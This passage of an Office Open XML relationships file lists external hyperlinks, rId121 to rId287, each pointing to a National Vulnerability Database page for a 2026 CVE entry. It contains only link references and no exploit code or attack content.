TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16504" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18221" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18351" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18658" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18749" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18922" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19931" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26035" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28606" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28780" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31020" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33815" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33816" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35868" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35869" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-36433" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37003" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37006" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37236" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37751" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38165" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39254" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39255" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40860" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41871" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42027" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42581" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45018" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45117" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45538" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46670" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47698" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47884" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4800" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48085" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48087" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49819" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49921" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50769" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50774" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50775" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50894" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51190" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51775" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52098" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52102" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52103" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52111" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52466" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52490" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52889" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52924" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53002" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53006" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53545" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53611" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54569" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55546" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55559" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56207" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57967" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58240" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58822" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61808" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62916" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63223" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66302" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67868" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67917" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67919" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67967" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68004" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68502" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68503" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69240" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69276" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69408" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69431" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69463" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69491" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69493" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69496" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69525" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69579" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69586" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69590" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69595" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69715" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69730" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69768" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69769" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69819" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69824" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69845" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71374" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71376" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71377" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71624" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71625" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71805" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7188" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72920" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72979" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72982" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72983" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73009" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73010" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73025" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73211" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73778" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75003" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75325" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75337" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75338" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75430" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75816" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76578" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76904" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77493" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77647" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77649" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77650" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77651" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77806" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78362" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78509" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78510" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78573" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7861" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78745" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79391" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79569" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79570" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79574" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79576" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79689" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79724" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79941" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80129" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80131" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80172" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80351" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80352" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81204" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81467" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82923" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83627" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8376" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84372" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85025" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85102" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85103" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85504" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85506" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85507" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85508" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85509" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86219" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86304" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86478" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86480" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 